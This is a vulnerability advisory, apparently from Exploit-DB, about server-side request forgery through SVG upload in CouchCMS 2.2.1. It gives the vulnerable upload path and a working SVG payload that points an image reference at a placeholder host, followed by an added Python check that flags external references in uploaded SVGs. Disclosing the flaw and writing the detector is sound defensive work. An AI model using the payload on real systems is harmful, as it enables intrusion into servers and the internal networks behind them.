CouchCMS 2.2.1 – Server-Side Request Forgery

  • Author: xxcdd
    Date: 2021-03-19
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/49675/
  • # Exploit Title: CouchCMS 2.2.1 - SSRF via SVG file upload
    # Date: 2021-01-25
    # Exploit Author: xxcdd
    # Vendor Homepage: https://github.com/CouchCMS/CouchCMS
    # Software Link: https://github.com/CouchCMS/CouchCMS
    # Version: v2.2.1
    # Tested on: Windows 7
    
    An issue was discovered in CouchCMS v2.2.1 (https://github.com/CouchCMS/CouchCMS/issues/130) that allows SSRF via an SVG upload to /couch/includes/kcfinder/browse.php.
    
    Upload URL: /couch/includes/kcfinder/browse.php?nonce=[yournonce]&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en
    
    ssrf.svg content:
    
    <?xml version="1.0" encoding="UTF-8" standalone="no"?>
    <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg"
    xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
    <image height="200" width="200" xlink:href="http://<test_ip>:1234" />
    </svg>
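
A defender-side check for the upload described above, added here as an example and not taken from the advisory, CouchCMS or KCFinder: it parses an uploaded SVG and reports every reference that points outside the file, such as the `xlink:href` on the `<image>` element. The function names `external_refs` and `accept_upload` are hypothetical, and the sample uses the documentation address 192.0.2.10 in place of `<test_ip>`.

```python
import re
import xml.etree.ElementTree as ET

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
HREF_ATTRS = {XLINK_HREF, "href", "src"}  # attributes a renderer may dereference
CSS_URL = re.compile(r"url\(\s*['\"]?([^'\")\s]+)", re.I)
INLINE_OK = ("#", "data:image/png", "data:image/jpeg", "data:image/gif")

# Constructed sample: the SVG from the advisory with a documentation address
# (192.0.2.10, RFC 5737) standing in for the <test_ip> placeholder.
SSRF_SVG = b"""<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
<image height="200" width="200" xlink:href="http://192.0.2.10:1234" />
</svg>"""

# Constructed sample: contains only a same-document fragment reference.
CLEAN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink">
<rect id="r" width="10" height="10"/><use xlink:href="#r"/></svg>"""

def is_local(ref):
    """Same-document fragments and inline raster images never leave the file."""
    return ref.strip().lower().startswith(INLINE_OK)

def external_refs(svg_bytes):
    """Return [(element, reference)] for every reference that leaves the document."""
    # Refuse DTDs and entities before parsing (entity expansion); UTF-16 input
    # would hide those markers from a byte search, so NUL bytes are refused too.
    upper = svg_bytes.upper()
    if b"\x00" in svg_bytes or b"<!DOCTYPE" in upper or b"<!ENTITY" in upper:
        raise ValueError("DTD, entity declaration or NUL byte in upload")
    findings = []
    for el in ET.fromstring(svg_bytes).iter():
        tag = el.tag.rsplit("}", 1)[-1]  # drop the namespace prefix
        refs = [v for k, v in el.attrib.items() if k in HREF_ATTRS]
        refs += CSS_URL.findall(el.get("style", ""))
        if tag == "style":
            refs += CSS_URL.findall(el.text or "")
        findings += [(tag, r) for r in refs if not is_local(r)]
    return findings

def accept_upload(svg_bytes):
    """Hypothetical upload gate: well-formed SVG with no outbound references."""
    try:
        return not external_refs(svg_bytes)
    except (ValueError, ET.ParseError):
        return False
```

The check covers href-style attributes and CSS `url()` values only. It does not inspect `@import` rules or `xml-stylesheet` processing instructions, so it complements processing uploads with outbound network access disabled rather than replacing it.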